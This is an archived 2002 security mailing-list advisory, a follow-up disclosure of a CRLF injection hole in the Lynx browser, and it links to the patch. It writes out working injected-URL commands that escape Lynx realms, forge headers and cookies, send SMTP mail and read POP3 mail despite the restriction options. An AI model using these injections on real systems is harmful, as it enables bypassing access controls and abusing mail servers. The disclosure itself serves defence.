OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Ulf Harnhammar (ulfh_at_update.uu.se)
Date: Thu Aug 22 2002 - 12:32:59 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Lynx CRLF Injection, part two

    This is a follow-up to my "Lynx CRLF Injection" post a few days
    ago.

    * Lynx has got a realm feature that restricts users from accessing
    any host apart from the host of its start page. That is, if you
    start Lynx with "lynx -realm http://www.site1.st/", you are not
    allowed to go to http://www.site2.st/ .

    The CRLF Injection security hole allows users to break out of
    realms - the command:

    $ lynx -realm "http://www.site1.st/ HTTP/1.0
    Host: www.site2.st

    "

    will show site2.st, despite the fact that it is outside of the realm.

    * It allows users to send arbitrary cookies, user agents and
    referers to a web server - even if you're using a restrictions option
    saying that you're not allowed to change user agent:

    $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0
    User-Agent: Ulf 0.0
    Referer: http://www.metaur.nu/
    Cookie: user=ulf

    "

    * It is also possible to use this hole for communication with other
    types of servers than HTTP servers. You can send e-mails with it, for
    example - even if you're using a restrictions option saying that
    you're not allowed to send e-mails:

    $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0
    HELO my.own.site
    MAIL FROM: <my.ownmail.address>
    RCPT TO: <infosite1.st>
    DATA
    From: my.ownmail.address
    To: infosite1.st
    Subject: This is..

    This is a URL that sends an e-mail (?).
    .
    QUIT

    "

    You have to use port 587, as Lynx blocks port 25.

    The MTA will complain about the "GET / HTTP/1.0" string, but it
    still works.

    * You can even use this hole for reading e-mails from a POP3 server:

    $ lynx "http://mail.site1.st:110/ HTTP/1.0
    USER ulf
    PASS xxxx
    LIST
    RETR 1
    QUIT

    "

    The POP3 server will also complain about the "GET / HTTP/1.0"
    string, but it still works with this technology as well.

    * As previously noted, the holes listed above mostly affects programs
    that start Lynx, interactively or not, with a URL wholly or partially
    under the user's control.

    * The patch for this hole has moved to:
       ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch

    // Ulf Harnhammar
    ulfhupdate.uu.se